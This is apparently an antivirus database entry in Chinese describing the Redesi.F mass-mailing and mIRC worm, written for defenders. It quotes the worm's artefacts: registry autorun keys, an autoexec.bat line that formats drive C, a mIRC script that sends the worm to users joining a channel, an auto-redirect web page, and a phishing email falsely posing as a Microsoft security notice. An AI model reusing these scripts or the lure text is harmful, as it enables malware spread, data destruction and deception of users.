病毒名称(中文):
红丝带变种F
病毒别名:
I-Worm.Redesi.f[AVP],I-Worm/Redesi.f[KV],Worm.Re
威胁级别:
★★☆☆☆
病毒类型:
蠕虫病毒
病毒长度:
11776
影响系统:
Win9xWinNT
病毒行为:
这是一个通过电子邮件和mIRC传播的蠕虫病毒。该病毒发作的时候会弹出一个Windows更新成功的消息框来欺骗用户,并将病毒的5个副本拷贝到C盘根目录下,在注册表中添加启动项,实现病毒的开机自启动。病毒还会向C:\autoexec.bat中写入2条批处理命令,一条显示“Withafoolnoseasonspend,orbecountedashisfreind.”,另一条则是格式化C盘。通过更改mIRC的脚本配置文件,使得mIRC系统与病毒文件建立联系,扩展病毒的传播途径。病毒还会生成一个html文件C:\inetpub\wwwroot\default.htm,当用户打开该页面的时候,就会打开病毒文件。该病毒在OutlookExpress的地址薄里面收集邮件地址,再以Microsoft的名义将病毒做为附件发送出去,该邮件极具欺骗性,用户很可能会受骗而去打开附件,从而感染该病毒。
1)在C盘根目录下建立病毒的多个副本(都是隐藏文件):
C:\Commond.exe
C:\MAPI.exe
C:\Sysupdate.exe
C:\UserConfig.exe
C:\disksync.exe
2)在注册表中为病毒的自启动添加启动项:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"Desire"="C:\commond.exe"
在KEY_LOCAL_MACHINE\Software\Microsoft下添加键值:
"Desire"="Done"
3)向C:\autoexec.bat写入以下内容:
ECHOWithafoolnoseasonspend,orbecountedashisfreind.
formatC:/autotest
4)向C:\mirc\script.ini写入以下内容:
[script]
n0=on1:JOIN:#:{
n1=.msg$nickDearUser.PleaseapplythispatchthatwillprotectyoufromUDPflooding.IfyouarerunningaLinuxIRCclientthisupdateisnotneededduetokernelfiltering.Regards.Dalnet/Undernetstaff.
n2=.copyC:\MAPI.exeC:\mirc\IRCUpdate.IRC.pif
n3=.dccsend$nickC:\mirc\IRCUpdate.IRC.pif
n4=}
5)建立文件:
C:\inetpub\wwwroot\Web.exe
生成对应该文件的网页文件:
C:\inetpub\wwwroot\default.htm
该文件的内容如下:
METAhttp-equiv="refresh"content="0;url=Web.exe"
Ahref="./Web.exe"
h3
WeAreForever
/h3
/A
6)取下面的某一行做为邮件的主题:
FW:WindowsatRisk.
FW:BufferoverflowcouldcauseITmeltdown.
FW:Insufficientboundschceckingcausebufferoverrun.
FW:ExecutablestackcouldcostITsectormillions.
FW:InvalidinstructioncausesAXandBXregisterstodiffer.
FW:Terroristsreleasecomputervirus.
FW:MicrosoftandC.E.R.TCorobaration
FW:Stackoverruncancausedatalossonfirstbootabledisk
FW:MicrosoftUpdate.FinalReleaseCandidate.
FW:Redesiworm.MAPIupdate..
7)邮件:
Hey.SorryI"venotemailedyouforawhile...wellIamnow.
JustlettingyouknowI"llbesendinganattachmentinmynextemail,soyoudon"thavetoworry.Iknowyoucan"tbetoocarefullwiththeseviriiaround,butthisisOK.
Speaktoyoulater.
Hey
Well,hereistheemailItoldyouIwasgoingtosend.
I"llspeaktoyoumorelater.Thebossiscomming.
-----OriginalMessage-----
From:MicrosoftSecurityList[mailto:security@microsoft.com]
Sent:25October200112:03
Subject:Bufferoverflow
DearSubscriber
DuetoinsufficientboundscheckingintheWindowsMessagingAPI
anyvaluestoresintheAXandBXregisters(andtheirregisterhalves
anyXOR(compare)operationagainstthesetoregistersorthehandlregisterhalfs
willalwaysreturnandvalueof1,causingtheJNEinstructiontoexecute.
WeconsiderthisaHIGHRISKvulnerability,andanycomputerhackerhavingany
knowledgeoftheassemblylanguagecouldwriteaworkingeggtoexploitthisflaw.
ItishighlyadvisedthatyouinstalltheattachedMAPIupdatetostopanysubsequentsecuritybreach.
Regards
MicrosoftSupport
8)取下面的某一个名字做为附件名:
Commond.exe
MAPI.exe
Sysupdate.exe
UserConfig.exe
disksync.exe